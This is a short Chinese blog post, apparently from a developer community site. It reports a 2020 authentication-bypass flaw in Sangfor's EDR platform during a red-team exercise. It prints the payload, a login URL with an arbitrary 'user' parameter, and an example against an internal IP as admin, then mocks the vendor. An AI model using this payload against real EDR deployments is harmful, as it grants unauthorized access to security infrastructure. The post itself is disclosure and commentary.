信服的不屈之心--终端检测响应平台漏洞再次爆发!

可能大家都有所耳闻,行动结束了。

当时是众说纷纭,有说甲方扛不住的,有说是红方的钓鱼信息的。刚开始我也以为是红队故意发的消息。

还有民间传言,各方猜测,各位吃瓜群众简直是云里雾里,到现在仍然是未知。 

可是,这并不影响大佬们对此次HW行动的神级操作。

就在今天(2020.8.20)凌晨左右(高手一般都是在夜深人静的时候行动)!

SXF的设备又。。。。哎,出现幺蛾子了。还是那个熟悉的EDR,老朋友了害。

不多说了,直接上payload:

payload: https://ip/ui/login.php?user=任意发挥

比如说:

payload: https://10.0.0.12/ui/login.php?user=admin

竟然直接可以登录平台!简直是滑天下之大稽。

作为安全公司,内心的千军万马肯定是奔腾而过!

源码上一张大佬的:

吐槽如下:

SXF:

关于此次活动:

1.24字社会主义核心价值观

2.没有网络安全就没有国家安全

3.各界高手、精英统一战线维护国家网络安全。

 

  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值